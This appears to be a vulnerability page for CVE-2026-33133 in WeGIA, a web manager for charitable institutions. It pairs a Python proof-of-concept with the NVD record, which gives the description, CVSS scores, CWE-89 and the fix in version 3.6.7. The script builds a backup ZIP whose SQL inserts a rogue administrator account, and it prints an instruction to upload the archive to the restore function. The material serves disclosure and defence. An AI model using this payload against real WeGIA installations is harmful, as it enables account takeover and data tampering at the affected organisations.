CVE-2026-33133

import zipfile import os # Simulating the creation of a malicious backup archive for CVE-2026-33133 # The vulnerability allows arbitrary SQL execution via backup import. def create_malicious_backup(filename='malicious_backup.zip'): # Malicious SQL content to create a rogue admin account # Note: The actual table structure depends on WeGIA's schema. # This is a conceptual Proof of Concept. malicious_sql = """ -- Attempt to create a new administrator INSERT INTO usuarios (nome, login, senha, email, nivel, status) VALUES ('Attacker', 'attacker_admin', 'md5_hash_of_password', '[email protected]', 'admin', '1'); -- Or modify existing password (Example) -- UPDATE usuarios SET senha = 'md5_hash_of_newpass' WHERE login = 'admin'; """ # Name the SQL file inside the archive as expected by the application sql_filename = 'backup.sql' # Create the zip file with zipfile.ZipFile(filename, 'w', zipfile.ZIP_DEFLATED) as zipf: zipf.writestr(sql_filename, malicious_sql) print(f"[+] Malicious backup archive '{filename}' created successfully.") print(f"[+] It contains '{sql_filename}' with SQL injection payload.") print(f"[+] Upload this file to the WeGIA backup restore function (requires High Privileges).") if __name__ == "__main__": create_malicious_backup()

{"cve": {"id": "CVE-2026-33133", "sourceIdentifier": "[email protected]", "published": "2026-03-20T11:18:03.037", "lastModified": "2026-03-20T19:29:20.317", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WeGIA is a web manager for charitable institutions. In versions 3.6.5 and 3.6.6, the loadBackupDB() function imports SQL files from uploaded backup archives without any content validation. An attacker can craft a backup archive containing arbitrary SQL statements that create rogue administrator accounts, modify existing passwords, or execute any database operation. This was introduced in commit 370104c. This issue was patched in version 3.6.7."}, {"lang": "es", "value": "WeGIA es un gestor web para instituciones benéficas. En las versiones 3.6.5 y 3.6.6, la función loadBackupDB() importa archivos SQL de archivos de copia de seguridad subidos sin ninguna validación de contenido. Un atacante puede crear un archivo de copia de seguridad que contenga sentencias SQL arbitrarias que creen cuentas de administrador maliciosas, modifiquen contraseñas existentes o ejecuten cualquier operación de base de datos. Esto fue introducido en el commit 370104c. Este problema fue parcheado en la versión 3.6.7."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wegia:wegia:3.6.5:*:*:*:*:*:*:*", "matchCriteriaId": "45337EFE-D771-4223-BE77-E226D1D72FBF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wegia:wegia:3.6.6:*:*:*:*:*:*:*", "matchCriteriaId": "2CE46858-8303-463F-8C23-DC40F207EBDC"}]}]}], "references": [{"url": "https://github.com/LabRedesCefetRJ/WeGIA/pull/1459", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/LabRedesCefetRJ/WeGIA/releases/tag/3.6.7", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-qqff-p8fc-hg5f", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}